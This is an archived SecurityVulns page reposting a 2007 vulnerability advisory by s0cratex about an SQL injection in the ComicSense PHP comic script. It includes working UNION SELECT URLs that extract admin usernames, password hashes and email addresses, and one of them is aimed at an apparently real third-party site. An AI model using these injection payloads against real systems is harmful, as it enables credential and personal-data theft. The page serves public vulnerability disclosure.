Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Full-disclosure] Wordpress default theme XSS (admin) and other problems

  phpWebThings ==>1.5.2 RFI

  Zen Help Desk ==> Version 2.1 Bypass/

  PHPMyDesk  Beta Release 1.0b ==> RFI

From:s0cratex_(at)_hotmail.com <s0cratex_(at)_hotmail.com>
Date:11 июня 2007 г.
Subject:Comicsense SQL Injection Advisory/Exploit

*********************************************
* Comicsense SQL Injection Advisory/Exploit *
*********************************************

by s0cratex
s0cratex@hotmail.com
http://plexinium.net

-
ComicSense is a script using php / mySQL.
It allows you to easily host an Online Comic
or Image shack.
You can download it from www.gayadesign.nl/comicsense/
-

The bug is a common sql injection in "index.php"

Line 32:
$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
And the variable $epi is not verified...

Exploit:
--------
Admin username
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users

MD5 hash password:
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users

e-Mail adress:
http://www.sneakyshits.com/comics/index.php?epi=-1 union select email,1,1 from users

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server